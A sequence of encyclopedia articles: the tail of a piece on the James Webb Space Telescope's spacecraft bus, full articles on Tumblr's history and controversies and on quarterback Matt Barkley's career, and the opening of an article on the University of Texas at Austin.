ft) and 16.19 meters (53.1 ft) of usable interior size. Gyroscopes There are two main traditional uses for gyroscopes in a spacecraft: to detect changes in orientation, and to actually change the orientation. JWST uses a type of gyroscope known as a hemispherical resonator gyroscope (HRG). This design has no bearings, rubbing parts, or flexible connections. This is not a traditional mechanical gyroscope; instead, an HRG has a quartz hemisphere that vibrates at its resonant frequency in a vacuum. Electrodes detect changes if the spacecraft moves to collect the desired information on orientation. The design is predicted to have a mean time before failure of 10 million hours. Gyroscopes failed on several occasions on the Hubble Space Telescope and had to be replaced several times. However, these were a different design called a gas-bearing gyroscope, which have certain benefits but experienced some long-term reliability issues. JWST will have six gyroscopes, but only two are required for pointing. JWST does not need as precise pointing because it has a Fine Steering Mirror that helps counter small motions of the telescope. The JWST telescope also has spinning reaction wheels, which can be adjusted to point the telescope without using propellant, as well as a set of small thrusters that can physically change the attitude of the telescope. The HRG are sensors that provide information, while the reaction wheels and thrusters are devices that physically change the orientation of the spacecraft. Together they work to keep the telescope in the right orbit and pointed in the desired direction. Docking ring In 2007, NASA said that JWST will also have a docking ring which would be attached to the telescope to support JWST being visited by an Orion spacecraft if such a mission became viable. An example of a mission was if everything worked but an antenna did not fold out. Two noted cases where small problems caused issues for space observatories includes Spacelab 2 IRT, and Gaia spacecraft- in each case stray material caused issue. On the Infrared Telescope (IRT) flown on the Space Shuttle Spacelab-2 mission, a piece of mylar insulation broke loose and floated into the line-of-sight of the telescope corrupting data. This was on the STS-51-F in the year 1985. Another case was in the 2010s on the Gaia spacecraft for which some stray light was identified coming from fibers of the sunshield, protruding beyond the edges of the shield. Integration The spacecraft bus is integrated into the whole JWST during construction. The spacecraft bus and the Sunshield segment are combined into what's called the Spacecraft Element, which is in turn combined with a combined structure of the Optical Telescope Element and Integrated Science Instrument Module called OTIS. That is the whole observatory, which is mounted to a cone which connects the JWST to the last stage of the Ariane 5 rocket. The spacecraft bus is where that cone connects to the rest of JWST. See also Satellite bus James Webb Space Telescope timeline Attitude control Spacecraft design Spacecraft thermal control Solar panels on spacecraft On-board data handling References External links Picture of the bus under construction Page 18 has some diagrams of the Bus James Webb Space Telescope
18701436
https://en.wikipedia.org/wiki/Tumblr
Tumblr
Tumblr (stylized as tumblr and pronounced "tumbler") is an American microblogging and social networking website founded by David Karp in 2007 and currently owned by Automattic. The service allows users to post multimedia and other content to a short-form blog. Users can follow other users' blogs. Bloggers can also make their blogs private. For bloggers, many of the website's features are accessed from a "dashboard" interface. As of July 2021, Tumblr hosts more than 529 million blogs. History Development of Tumblr began in 2006 during a two-week gap between contracts at David Karp's software consulting company, Davidville. Karp had been interested in tumblelogs (short-form blogs, hence the name Tumblr) for some time and was waiting for one of the established blogging platforms to introduce their own tumblelogging platform. As none had done so after a year of waiting, Karp and developer Marco Arment began working on their own platform. Tumblr was launched in February 2007, and within two weeks had gained 75,000 users. Arment left the company in September 2010 to work on Instapaper. In June 2012, Tumblr featured its first major brand advertising campaign in conjunction with Adidas, who launched an official soccer Tumblr blog and bought placements on the user dashboard. This launch came only two months after Tumblr announced it would be moving towards paid advertising on its site. On May 20, 2013, it was announced that Yahoo and Tumblr had reached an agreement for Yahoo! Inc. to acquire Tumblr for $1.1 billion in cash. Many of Tumblr's users were unhappy with the news, causing some to start a petition, achieving nearly 170,000 signatures. David Karp remained CEO and the deal was finalized on June 20, 2013. Advertising sales goals were not met and in 2016 Yahoo wrote down $712 million of Tumblr's value. Verizon Communications acquired Yahoo in June 2017, and placed Yahoo and Tumblr under its Oath subsidiary. Karp announced in November 2017 that he would be leaving Tumblr by the end of the year. Jeff D'Onofrio, Tumblr's President and COO, took over leading the company. The site, along with the rest of the Oath division (renamed Verizon Media Group in 2019), continued to struggle under Verizon. In March 2019, SimilarWeb estimated Tumblr had lost 30% of its user traffic since December 2018, when the site had introduced a stricter content policy with heavier restrictions on adult content (which had been a notable draw to the service). In May 2019, it was reported that Verizon was considering selling the site due to its continued struggles since the purchase (as it had done with another Yahoo property, Flickr, via its sale to SmugMug). Following this news, Pornhub's vice president publicly expressed interest in purchasing Tumblr, with a promise to reinstate the previous adult content policies. On August 12, 2019, Verizon Media announced that it would sell Tumblr to Automattic—operator of blog service WordPress.com and corporate backer of the open source blog software of the same name—for an undisclosed amount. Axios reported that the sale price was less than $3 million, a significant decrease over Yahoo's original purchase price. Automattic CEO Matt Mullenweg stated that the site will operate as a complementary service to WordPress.com, and that there were no plans to reverse the content policy decisions made during Verizon ownership. Features Blog management Dashboard: The dashboard is the primary tool for the typical Tumblr user. It is a live feed of recent posts from blogs that they follow. Through the dashboard, users are able to comment, reblog, and like posts from other blogs that appear on their dashboard. The dashboard allows the user to upload text posts, images, videos, quotes, or links to their blog with a click of a button displayed at the top of the dashboard. Users are also able to connect their blogs to their Twitter and Facebook accounts; so whenever they make a post, it will also be sent as a tweet and a status update. Queue: Users are able to set up a schedule to delay posts that they make. They can spread their posts over several hours or even days. Tags: Users can help their audience find posts about certain topics by adding tags. If someone were to upload a picture to their blog and wanted their viewers to find pictures, they would add the tag #picture, and their viewers could use that word to search for posts with the tag #picture. HTML editing: Tumblr allows users to edit their blog's theme HTML coding to control the appearance of their blog. Users are also able to use a custom domain name for their blog. Mobile With Tumblr's 2009 acquisition of Tumblerette, an iOS application created by Jeff Rock and Garrett Ross, the service launched its official iPhone app. The site became available to BlackBerry smartphones on April 17, 2010, via a Mobelux application in BlackBerry World. In June 2012, Tumblr released a new version of its iOS app, Tumblr 3.0, allowing support for Spotify integration, hi-res images and offline access. An app for Android is also available. A Windows Phone app was released on April 23, 2013. An app for Google Glass was released on May 16, 2013. Inbox and messaging Tumblr blogs have the option to allow users to submit questions, either as themselves or anonymously, to the blog for a response. Tumblr also offers a "fan mail" function, allowing users to send messages to blogs that they follow. On November 10, 2015, Tumblr introduced an integrated instant messaging function, allowing users to chat with other Tumblr users. The feature was rolled out in a "viral" manner; it was initially made available to a group of 1500 users, and other users could receive access to the messaging system if they were sent a message by any user that had received access to the system itself. The messaging platform replaces the fan mail system, which was deprecated. The ability to send posts to others via the Dashboard was added the following month. In November 2019, Tumblr introduced "group chats"—ephemeral chat rooms surfaced via searches, designed to allow users to share content in real-time with users who share their interests. Posts disappear after 24 hours and cannot be edited. Original content In May 2012, Tumblr launched Storyboard, a blog managed by an in-house editorial team which features stories and videos about noteworthy blogs and users on Tumblr. In April 2013, Storyboard was shut down. In March 2018, Tumblr began to syndicate original video content from Verizon-owned video network go90, as part of an ongoing integration of Oath properties, and reported plans to wind down go90 in favor of using Oath properties to distribute its content instead. This made the respective content available internationally, since go90 is a U.S.-only service. Paid content On July 21, 2021, Tumblr launched Post+ for some beta users, allowing bloggers to monetize their content. Usage Tumblr has been noted for the socially progressive views of its users. In 2011, the service was most popular with the teen and college-aged user segments with half of Tumblr's visitor base being under the age of 25. In April 2013, the website received more than 13 billion global page views. User activity, measured by the number of blog posts each day, peaked at over 100 million in early 2014 and declined in each of the next three years, to approximately 30 million by October 2018. As of May 2019, Tumblr hosted over 465 million blogs and more than 172 billion posts in total with over 21 million posts created on the site each day. Adult content At the time of its acquisition by Yahoo, Tumblr was described by technology journalists as having a sizable amount of pornographic content. An analysis conducted by news and technology site TechCrunch on May 20, 2013, showed that over 22% of all traffic in and out of Tumblr was classified as pornography. In addition, a reported 16.45% of blogs on Tumblr exclusively contained pornographic material. Following July 2013 and its acquisition by Yahoo, Tumblr progressively restricted adult content on the site. In July 2013, Tumblr began to filter content in adult-tagged blogs from appearing in search results and tagged displays unless the user was logged in. In February 2018, Safe Mode (which filters "sensitive" content and blogs) became enabled by default for all users on an opt-out basis. On December 3, 2018, Tumblr announced that effective December 17, all images and videos depicting sex acts, and real-life images and videos depicting human genitalia or "female-presenting" nipples, would be banned from the service. Exceptions are provided for illustrations or art that depict nudity, nudity related to "political or newsworthy speech", and depictions of "female-presenting" nipples in relation to medical events such as childbirth, breastfeeding, mastectomy and gender reassignment surgery. The rules do not apply to text content. All posts in violation of the policy are hidden from public view, and repeat offenders may be reprimanded. Shortly prior to the announcement, Tumblr's Android app was patched to remove the ability to disable Safe Mode. The change faced wide criticism among Tumblr's community; in particular, it has been argued that the service should have focused on other major issues (such as controlling hate speech or the number of porn-related spambots on the service), and that the service's adult community provided a platform for sex education, independent adult performers (especially those representing LGBT communities who feel that they are under-represented by a heteronormative mainstream industry) seeking an outlet for their work, and those seeking a safe haven from "over-policed" platforms to share creative work with adult themes. Tumblr stated that it was using various algorithms to detect potential violations, in combination with manual reviews. Users quickly discovered a wide array of false positives. A large number of users scheduled protest actions on December 17. On the day the ban took effect, Tumblr issued a new post clarifying the new policy, showcasing examples of adult images still allowed on the service, and stating that it "fully recognized" its "special obligation" to serving its LGBT userbase, and that "LGBTQ+ conversations, exploration of sexuality and gender, efforts to document the lives and challenges of those in the sex worker industry, and posts with pictures, videos, and GIFs of gender-confirmation surgery are all examples of content that is not only permitted on Tumblr but actively encouraged." Wired cited multiple potential factors in the ban, including that the presence of adult content made the service unappealing to potential advertisers, the Stop Enabling Sex Traffickers Act (a U.S. federal law which makes websites liable for knowingly assisting or facilitating illegal sex trafficking), as well as heavy restrictions on adult content imposed by Apple for software offered on the iOS App Store (which similarly prompted several Reddit clients to heavily frustrate the ability for users to access forums on the site that contain adult content). In January 2022, Tumblr reached a settlement with New York City’s Commission on Human Rights, which had claimed that the 2018 ban on adult content disproportionately affected LGBTQ+ users. The agreement required to company to review its algorithms, revise its appeals process and review closed cases, and train its human moderators on diversity and inclusion issues. Corporate affairs Tumblr's headquarters is at 770 Broadway in New York City. The company also maintains a support office in Richmond, Virginia. As of June 1, 2017, Tumblr had 411 employees. The company's logo is set in Bookman Old Style with some modifications. Funding Tumblr had received about $125 million of funding from investors. The company has raised funding from Union Square Ventures, Spark Capital, Martín Varsavsky, John Borthwick (Betaworks), Fred Seibert, Krum Capital, and Sequoia Capital (among other investors). In its first round of funding in October 2007, Tumblr raised $750,000 from Spark Capital and Union Square Ventures. In December 2008 the company raised $4.5 million in Series B funding and a further $5 million in April 2010. In December 2010 Tumblr raised $30 million in Series D funding. The company had an $800 million valuation in August 2011. In September 2011 the company raised $85 million in a round of funding led by Greylock Partners and Insight Venture Partners. Revenue sources In an interview with Nicole Lapin of Bloomberg West on September 7, 2012, David Karp said the site was monetized by advertising. Their first advertising launch started in May 2012 after 16 experimental campaigns. Tumblr made $13 million in revenue in 2012 and hoped to make $100 million in 2013. Tumblr reportedly spent $25 million to fund operations in 2012. In 2013, Tumblr began allowing companies to pay to promote their own posts to a larger audience. Tumblr Head of Sales, Lee Brown, has quoted the average ad purchase on Tumblr to be nearly six figures. Tumblr also allows premium theme templates to be sold for use by blogs. In July 2016, advertisements were implemented by default across all blogs. Users may opt-out, and the service stated that a revenue sharing program would be implemented at a later date. In February 2022, Tumblr launched an ad-free subscription option that removes the marketing from microblogs for $5 per month, or $40 per year. Criticism Copyright issues Tumblr has received criticism for copyright violations by participating bloggers; however, Tumblr accepts Digital Millennium Copyright Act (DMCA) take-down notices. Tumblr's visual appeal has made it ideal for photoblogs that often include copyrighted works from others that are re-published without payment. Tumblr users can post unoriginal content by "Reblogging", a feature on Tumblr that allows users to re-post content taken from another blog onto their own blog with attribution. Security Tumblr has been forced to manage spam and security problems. For example, a chain letter scam in May 2011 affected 130,000 users. On December 3, 2012, Tumblr was attacked by a cross-site scripting worm deployed by the Internet troll group Gay Nigger Association of America. The message urged users to harm themselves and criticized blogging in general. User interface changes In 2015, Tumblr faced criticism by users for changes to its reblog mechanisms. In July 2015, the system was modified so that users cannot remove or edit individual comments by other users when reblogging a post; existing comments can only be removed all at once. Tumblr staff argued that the change was intended to combat "misattribution", though this move was met by criticism from ‘ask blogs’ and ‘RP blogs’, which often shortened long chains of reblogs between users to improve readability. In September 2015, Tumblr changed how threads of comments on reblogged posts are displayed; rather than a nested view with indentations for each post, all reblogs are now shown in a flat view, and user avatars were also added. The change was intended to improve the legibility of reblogs, especially on mobile platforms, and complements the inability to edit existing comments. Although some users had requested such a change to combat posts made illegible by extremely large numbers of comments on a reblogged post, the majority of users (even those who had requested such a change) criticized the new format. The Verge was also critical of the changes, noting that it was cleaner, but made the site lose its "nostalgic charm". Userbase behaviour While Tumblr's userbase has generally been received as accommodating people from a wide range of ideologies and identities, a common point of criticism is that attitudes from users on the site stifle discussion and discourse. In 2015, members of the Steven Universe fandom drove an artist to the point of attempting suicide over their artwork, in which they drew characters thin that are typically seen as being 'fat' in the show. In 2018, Kotaku reporter Gita Jackson described the site as a 'joyless black hole', citing how the website's design and functionality led to 'fandoms spinning out of control', as well as an environment which inhibited discussion and discourse. Promotion of self-harm and suicide In February 2012, Tumblr banned blogs that promote or advocate suicide, self-harm and eating disorders (pro-ana). The suicide of a British teenager, Tallulah Wilson, raised the issue of suicide and self-harm promotion on Tumblr as Wilson was reported to have maintained a self-harm blog on the site. A user on the site is reported to have sent Wilson an image of a noose accompanied by the message: "here is your new necklace, try it on." In response to the Wilson case, Maria Miller, the UK's minister for culture, media, and sport, said that social media sites like Tumblr need to remove "toxic" self-harm content. Searching terms like "depression", "anxiety", and "suicide" on Tumblr now brings up a PSA page directing the user to resources like the national suicide lifeline, and 7 Cups; as well as an option to continue to the search results. There are concerns of some Tumblr posts glorifying suicide and depression among young people. Politics In February 2018, BuzzFeed published a report claiming that Tumblr was utilized as a distribution channel for Russian agents to influence American voting habits during the 2016 presidential election. Despite policies forbidding hate speech, Tumblr has been noted for hosting content from Nazis and white supremacists. In May 2020, Tumblr announced that it will remove reblogs of terminated hate speech posts, specifically Nazi and white supremacist content. Censorship Several countries have blocked access to Tumblr because of pornography, religious extremism or LGBT content. These countries include China, Indonesia, Kazakhstan and Iran. In February 2016, the Indonesian government temporarily blocked access to Tumblr within the country because the site hosted pages that carried pornography. The government shortly reversed its decision to block the site and said it had asked Tumblr to self-censor its pornographic content. Adult content ban In November 2018, Tumblr's iOS app was removed by Apple from its App Store after illegal child pornography images were found on the service. Tumblr stated that all images uploaded to the service are scanned against an industry database, but that a "routine audit" had revealed images that had not yet been added to the database. In the wake of the incident, a number of Tumblr blogs—particularly those dealing primarily in adult-tagged artwork such as erotica, as well as art study and anatomy resources—were also deleted, with affected users taking to other platforms (such as Twitter) to warn others and complain about the deletions, as well as encourage users to back up their blog's contents. Tumblr subsequently removed the ability to disable "Safe Mode" from its Android app, and announced a wider ban on explicit images of sex acts and nudity on the platform with certain limited exceptions. Tumblr deployed an automatic content recognition system which resulted in many non-pornographic images being removed from the platform. In December, 2018, about a month after it was initially banned, Tumblr's iOS app was restored to the app store. The site was known for its popularity with adult content that attracted women and catered for other under-served audiences. Notable users Celebrities who have used Tumblr include Taylor Swift, Lady Gaga, Ariana Grande, Zooey Deschanel, John Mayer, B.o.B, Soulja Boy, Fergie, Anthony Bourdain, John Green, Zayn, Lana Del Rey, Grimes, Hayley Williams, Frank Ocean, Lorde, Sufjan Stevens, Jhené Aiko, Amandla Stenberg, Karlie Kloss, Dianna Agron, and Camila Cabello. On October 21, 2011, then-U.S. President Barack Obama created a Tumblr. See also Comparison of microblogging services Comparison of free blog hosting services List of social networking websites Tech companies in the New York metropolitan area References External links 2007 establishments in New York City 2013 mergers and acquisitions 2019 mergers and acquisitions Automattic Blog hosting services Companies based in Manhattan Internet properties established in 2007 Microblogging software Microblogging services Social media Software companies based in New York City Software companies of the United States Webby Award winners WordPress
14775644
https://en.wikipedia.org/wiki/Matt%20Barkley
Matt Barkley
Matthew Montgomery Barkley (born September 8, 1990) is an American football quarterback who is a free agent. He played college football at Southern California, and was drafted by the Philadelphia Eagles in the fourth round of the 2013 NFL Draft. He has also played for the Chicago Bears, Arizona Cardinals, San Francisco 49ers, Cincinnati Bengals, Buffalo Bills, Tennessee Titans, and Carolina Panthers. Early years Barkley was born in Newport Beach, California, and attended Mater Dei High School in Santa Ana. In 2005, he became the first freshman quarterback to start at Mater Dei since Todd Marinovich. As a freshman, he passed for 1,685 yards and 10 touchdowns, but suffered a season-ending injury (broken collarbone) during the playoffs in a quarterfinal win over Colton High School. The injury was caused by future University of Southern California (USC) teammate, running back Allen Bradford, who played linebacker in high school. Barkley's high school coach, Bruce Rollinson, permitted him to call his own plays, something he had never allowed a player to do during two decades at Mater Dei. As a sophomore, he passed for 1,349 yards and 11 touchdowns in 2006. Barkley passed for 3,576 yards and 35 touchdowns in 2007, completing 63 percent of his passes with nine interceptions. In three seasons, he passed for 6,994 yards and 57 touchdowns. Barkley was named 2007 football Gatorade National Player of the Year, and then the 2007 Gatorade national male athlete of the year, becoming the first non-senior to win both awards. Barkley also won the 2007 Glenn Davis Award, given to the best high school football player in Southern California, and the inaugural Joe Montana Award as the nation's top high school quarterback. Barkley was rated as the top prospect in the nation for the Class of 2009 by ESPN. He was rated the top prospect by Rivals.com. Quarterback coach Steve Clarkson described Barkley as a cross between Joe Montana and Tom Brady. As a top high school player, Barkley was heavily recruited. On January 23, 2008, Barkley verbally committed to USC, ending speculation that he might join UCLA, which had just hired coaches Rick Neuheisel and Norm Chow. Barkley's father, Les Barkley, was an All-American water polo player at USC from 1976 to 1979. He made his decision more than a year before his National Signing Day, telling his family and coaches and then calling USC coach Pete Carroll on his cell phone. The previous quarterback to go to USC from Mater Dei was Heisman Trophy-winner Matt Leinart (the school had also graduated fellow Heisman winner John Huarte). After committing to USC, Barkley began recruiting other elite high school players to join him. His 2008 senior season started slow, with Barkley throwing nearly as many interceptions as touchdown passes and the Monarchs barely keeping above .500; however, his performance turned around and Mater Dei rallied to 7–3 and entered the playoffs. The Monarchs made it to the quarterfinal, falling to Tesoro High School and ending the season 8–4. Barkley finished his Mater Dei High School career as the all-time passing yardage leader in Orange County, surpassing the record set by Todd Marinovich in 1987. He graduated from high school on December 18, 2008. On January 4, 2009, Barkley participated in Under Armour All-America Game at the Florida Citrus Bowl. After a strong performance, where he completed 11-of-22 passes for 237 yards and two touchdowns and led the White team to a 27–16 victory over the Black team, he was named the game's co-MVP. Soon afterward, he was moved back to the number one high school prospect in America by ESPN, having dropped to tenth during his senior season. College career After graduating from high school a semester early, Barkley enrolled in the University of Southern California in January 2009 so he could participate in spring practice with the USC Trojans football team. He would play for the Trojans for the next four seasons, from 2009 to 2012. 2009 With the early departure of the Trojans' previous starting quarterback, Mark Sanchez, for the NFL, and with no clear successor, a three-way quarterback battle emerged during spring practices between Barkley and quarterbacks Aaron Corp and Mitch Mustain, both of whom had held the second quarterback spot at various times throughout the season; the latter had been the starting quarterback at Arkansas for eight games in 2006. Barkley adapted to the Trojans offense and gave strong performances during spring practices: trying for and making big plays but also throwing several key interceptions. Impressing his coaches, Barkley climbed to the number two spot at the end of Spring behind Corp. Afterward, ESPN NFL Draft analyst Mel Kiper Jr. stated he believed that in "three years Matt Barkley—who will be a true freshman this year—will be the No. 1 pick in the draft." On August 27, during fall practices, Carroll named Barkley the starter for the 2009 season opener against San Jose State. Barkley is the first true freshman quarterback to ever start an opener for the Trojans, and the first true freshman to start the opener for a preseason top-five team since Rick Leach did it for #3 Michigan in 1975. After a slow first quarter, Barkley finished his college debut 233 yards, throwing 15-for-19 with one touchdown in a 56–3 victory. Barkley's second game brought his first major test and first road game, against the highly ranked Ohio State Buckeyes. Before a sold-out, raucous crowd at Ohio Stadium, Barkley led a game-winning, 86-yard drive late in the fourth quarter, earning significant praise from the sports media. Barkley suffered a shoulder bruise in the Ohio State game, and had to sit out the following week's game at Washington. With Aaron Corp at the helm, the Trojans struggled in a major upset loss, falling to the unranked Huskies 16–13 while putting up the lowest number of passing yards for a USC team since Carroll took over the program in 2001. Carroll had Barkley, who wasn't fully recovered from his injury, start the next game against Washington State. Barkley contributed to a 27–6 victory, passing for 247 yards and two touchdowns. He followed this up with 282 passing yards in a 30–3 win over California on October 3. The next week against Notre Dame, he was 19 for 29 with two touchdowns. He followed that up with a 15–25 two touchdown game against Oregon State. Against Stanford he threw three interceptions and only one touchdown. Two weeks later he went one touchdown and one interception in a 28–7 victory over UCLA. The following week, he also, went 1–1 in a 21–17 loss to Arizona. He closed his freshman season by throwing for 350 yards and two touchdowns against Boston College in the 2009 Emerald Bowl. 2010 On September 2, 2010, Barkley led the Trojans to an opening week victory at Hawaii by a score of 49–36. Barkley contributed five passing touchdowns (three to wide receiver Ronald Johnson) on 17-of-23 passing for 257 yards. The win marked a successful debut for new USC head coach Lane Kiffin and the first win under USC's 2010 NCAA probation and sanctions. Both teams amassed over 500 yards of total offense. Barkley said, "I'm just trying to be as perfect as I can be. Last week was pretty close, but that perfect game is kind of a goal and that's no incompletions." Coach Kiffin added, "We'll see if he can continue to do it again. Great quarterbacks put together good games every week." Matt Barkley continued a solid sophomore campaign. With notable performances against Stanford and Cal. Barkley sprained his ankle during a loss to Oregon State and was forced to the sideline for the Notre Dame game. He returned to lead the Trojans to a gutsy 28–14 victory over UCLA. 2011 Barkley began 2011 by setting the USC single-game record for completions with 34 against Minnesota. On October 1, against Arizona, he passed for a USC single-game record for 468 yards. On November 4, he passed for a USC single-game record for touchdowns in a game with six, against the Colorado Buffaloes, one of the two additions to the Pac-12 in its inaugural season; the game was the first against Colorado since 2002. He had previously tied the single-game touchdown record three times, sharing it with Rodney Peete, Carson Palmer, Matt Leinart and Mark Sanchez. On November 26, against the UCLA, he tied the single-game touchdown record again in a 50–0 shutout of the Bruins. On national television, Barkley stated the best moment of the UCLA game was his pass to his cousin Robbie Boyer. Over the 2011 season, Barkley accumulated 39 touchdowns, an all-time Pac-12 record, and helped end the season with a 10–2 record. Barkley had the 6th most votes for the Heisman Trophy. He finished with a 39–7 touchdown-to-interception ratio while completing 69.1% of his passes. He won the 2011 CFPA National Performer of the Year Trophy with his record-breaking season. On December 22, 2011, at a press conference convened at Heritage Hall, Barkley announced he would return for his senior year with the USC Trojans rather than entering the 2012 NFL Draft. Barkley announced his return to USC in his own unique way by giving Coach Kiffin a homemade ornament for Christmas with a picture of them at the Colorado game, but on the back revealing the text "One more year." Barkley has described his decision to stay at University of Southern California in his senior as "unfinished business", as he wanted to be part of a team that would be aiming for the BCS championship after a two-year postseason ban. 2012 Going into his senior season, Barkley was widely considered a favorite to win the Heisman Trophy. At the beginning of the season, USC was ranked #1 in the preseason poll, but a 21–14 loss to then-#21 Stanford ended USC's potential BCS national championship run. USC then went on to lose five games that year, including a late-season loss to rival UCLA for the first time in six years. Barkley was knocked out of that game by UCLA's Anthony Barr with a shoulder separating hit, thus ending his regular season abruptly. On December 27, 2012, head coach Lane Kiffin announced Barkley wouldn't play in the Sun Bowl because of his shoulder injury, effectively ending his college football career. Statistics Professional career Despite being projected a first-round selection for the 2012 NFL Draft by midseason of 2011, Barkley decided to return to USC for his senior season. As early as April 2012, he was projected the No. 1 overall pick for the 2013 NFL Draft. However, one month prior to the draft, Barkley's draft stock had fallen with ESPN draft analysts Mel Kiper Jr. and Todd McShay projecting Barkley to fall out of the first round. Due to his shoulder injury, Barkley did not throw in the Indianapolis NFL Scouting Combine and instead took medical tests on his shoulder. Philadelphia Eagles The Philadelphia Eagles selected Barkley in the fourth round with the 98th overall pick of the 2013 NFL Draft. Going into training camp, it was announced that he would be given a chance to compete for the starting quarterback job, facing off against the two starting quarterbacks from the previous season, Nick Foles and Michael Vick. On October 20, 2013, he saw his first NFL action against the Dallas Cowboys as he came in to relieve Nick Foles, who left early in the fourth quarter due to a head injury. In that game, Barkley completed 11 of his 20 pass attempts for 129 yards and threw three interceptions. Barkley's second game came the following week in relief of Foles (concussion) and Vick (quadriceps) on October 27 versus the New York Giants. Barkley completed 17 of 26 passes for 158 yards and one interception to go along with recording one fumble inside their red zone. Arizona Cardinals The Eagles traded Barkley to the Arizona Cardinals for a conditional seventh-round pick in the 2016 NFL Draft on September 4, 2015. The terms said that he needed to be on the roster for 6 games, which were fulfilled on October 17, 2015. On September 3, 2016, Barkley was released by the Cardinals. Chicago Bears Barkley was signed to the Chicago Bears' practice squad on September 4, 2016. He was elevated to the active roster on September 22, 2016. Following an injury to the Bears' backup quarterback Brian Hoyer against the Green Bay Packers on October 20, Barkley made his first appearance as a member of the Chicago Bears, going 6 of 15 for 81 yards; he threw for zero touchdowns and two interceptions. After Jay Cutler suffered a shoulder injury against the Giants, Barkley started the following week's game against the Tennessee Titans. Barkley completed 28 of 54 passes for 316 yards with three touchdowns, two interceptions, and a 72.8 passer rating, nearly rallying the Bears from a 20-point deficit in the fourth quarter before losing 27–21. Barkley earned his first NFL win the very next week on December 4, a 26–6 win over the San Francisco 49ers at Soldier Field. This was the Bears' third and last victory of the season. He completed 11 for 18 passes for 192 yards, no touchdowns, no interceptions, and a 97.5 passer rating. On December 18, Barkley completed 30 passes for 362 yards, two touchdowns and three interceptions as the Bears nearly upset the Green Bay Packers, ultimately losing 30–27 on a last-second field goal. It was the most yards by a Bears quarterback in a game against Green Bay in the rivalry's history. Barkley struggled in the following week's game against the Washington Redskins, a 41–21 loss; although he threw for 323 yards and two touchdown passes, he also threw five interceptions, including on four consecutive drives in the second half. The five interceptions were the most by a Bears quarterback since Cutler threw five in 2009. In Week 17, Barkley caught a touchdown from wide receiver Cameron Meredith on a trick play; while Barkley was calling at the line of scrimmage, the ball was snapped to running back Jeremy Langford, who handed it off to Meredith before throwing it to a wide-open Barkley for the touchdown. He ended the 2016 season with eight touchdown passes and 14 interceptions. Of his 216 pass attempts, 89 went for a first down (41.2 percent), the second-highest percentage in the NFL behind the Atlanta Falcons' Matt Ryan (44.6). San Francisco 49ers On March 10, 2017, Barkley signed a two-year contract with the San Francisco 49ers. On September 1, 2017, he was released by the 49ers at the end of the preseason after throwing for just 197 yards with no touchdowns or interceptions. He was beaten out by veteran Brian Hoyer and rookie C. J. Beathard. Arizona Cardinals (second stint) On November 13, 2017, Barkley re-signed with the Cardinals due to Drew Stanton possibly missing playing time as a result of a knee sprain. However, Barkley was inactive for the entire season. Cincinnati Bengals On March 17, 2018, Barkley signed a two-year contract with the Cincinnati Bengals. He was placed on injured reserve on September 1, 2018 after suffering a knee injury in the preseason. Barkley was released on September 12, 2018 with an injury settlement. Buffalo Bills On October 31, 2018, Barkley was signed by the Buffalo Bills. On November 11, it was announced that he would start for the Bills against the New York Jets over Nathan Peterman with starter Josh Allen injured. Barkley, making his first NFL start in two years, threw for 232 yards and two touchdown passes as Buffalo beat the Jets 41–10, snapping the team's four-game losing streak. On December 21, 2018, Barkley signed a two-year contract extension with the Bills through the 2020 season. In Week 4 of the 2019 season, Barkley came into the game against the New England Patriots to relieve Josh Allen, who had experienced an in-game head injury. He passed for 127 yards and one interception in the 16–10 loss. He made one other appearance in Week 17 against the New York Jets, where he passed for 232 yards and two interceptions in relief of Allen in the 13–6 loss. During the 2020 season, Barkley saw action in five regular season games and threw his first touchdown pass since the 2018 season, a 56-yard completion to wide receiver Gabriel Davis, during the final game of the season against the Miami Dolphins. Barkley finished the regular season completing 11 of 21 passes for 197 yards, one touchdown, and one interception. Tennessee Titans Barkley was signed a two-year contract with the Tennessee Titans on August 5, 2021. He was released on September 1, 2021 and re-signed to the practice squad. Carolina Panthers On November 10, 2021, Barkley was signed by the Carolina Panthers off the Titans' practice squad. He was waived on December 28. Atlanta Falcons On December 29, 2021, Barkley was claimed off waivers by the Atlanta Falcons. He was waived on January 4, 2022 and re-signed to the practice squad. His contract expired when the team's season ended on January 9, 2022. NFL career statistics Personal life Barkley's cousin, Robbie Boyer, was a walk-on at USC during Barkley's freshman, sophomore, and junior years. Barkley's younger siblings, twins Sam and Lainy, also attended USC. Barkley is a Christian. During Christmas 2008, Barkley went with a group of friends and family to help run an orphanage in South Africa. For Christmas 2010, he spent his winter break in Nigeria "visiting orphans, widows, villagers and prisoners, doing construction work, distributing supplies and gifts and sharing daily fellowship." In 2012, Barkley led a group of 16 USC football teammates to Haiti, where they built houses and delivered more than 2,000 pounds of supplies for orphanages and schools. He appears on I Am Second, sharing the story of his Christian faith and personal relationship with Jesus Christ. At the beginning of his USC career, Barkley befriended former USC Olympian, World War II prisoner of war and inspirational speaker Louis Zamperini. Barkley married his high school sweetheart Brittany Langdon, a year after he graduated from USC, in July 2013. In December 2014, she announced via Twitter she was pregnant. Their son was born in 2015. See also List of Division I FBS passing touchdown leaders References External links Buffalo Bills bio Chicago Bears bio Philadelphia Eagles bio USC Trojans bio 1990 births Christians from California American football quarterbacks Arizona Cardinals players Chicago Bears players Living people Philadelphia Eagles players Players of American football from California Sportspeople from Newport Beach, California Under Armour All-American football players USC Trojans football players San Francisco 49ers players Cincinnati Bengals players Buffalo Bills players Tennessee Titans players Carolina Panthers players Atlanta Falcons players
32031
https://en.wikipedia.org/wiki/University%20of%20Texas%20at%20Austin
University of Texas at Austin
The University of Texas at Austin (UT Austin, UT, or Texas) is a public research university in Austin, Texas, founded in 1883. The University of Texas was included in the Association of American Universities in 1929. The institution is composed of over 50,000 undergraduate and graduate students and over 24,000 faculty and staff. It is a major center for academic research, with research expenditures totaling $679.8 million for fiscal year 2018. The university houses seven museums and seventeen libraries, including the LBJ Presidential Library and the Blanton Museum of Art, and operates various auxiliary research facilities, such as the J. J. Pickle Research Campus and the McDonald Observatory. As of November 2020, 13 Nobel Prize winners, four Pulitzer Prize winners, two Turing Award winners, two Fields medalists, two Wolf Prize winners, and two Abel prize winners have been affiliated with the school as alumni, faculty members or researchers. The university has also been affiliated with three Primetime Emmy Award winners, and as of 2021 its students and alumni have earned a total of 155 Olympic medals. Student-athletes compete as the Texas Longhorns. The Longhorns have won four NCAA Division I National Football Championships, six NCAA Division I National Baseball Championships, thirteen NCAA Division I National Men's Swimming and Diving Championships, and has claimed more titles in men's and women's sports than any other school in the Big 12. History Establishment The first mention of a public university in Texas can be traced to the 1827 constitution for the Mexican state of Coahuila y Tejas. Although Title 6, Article 217 of the Constitution promised to establish public education in the arts and sciences, no action was taken by the Mexican 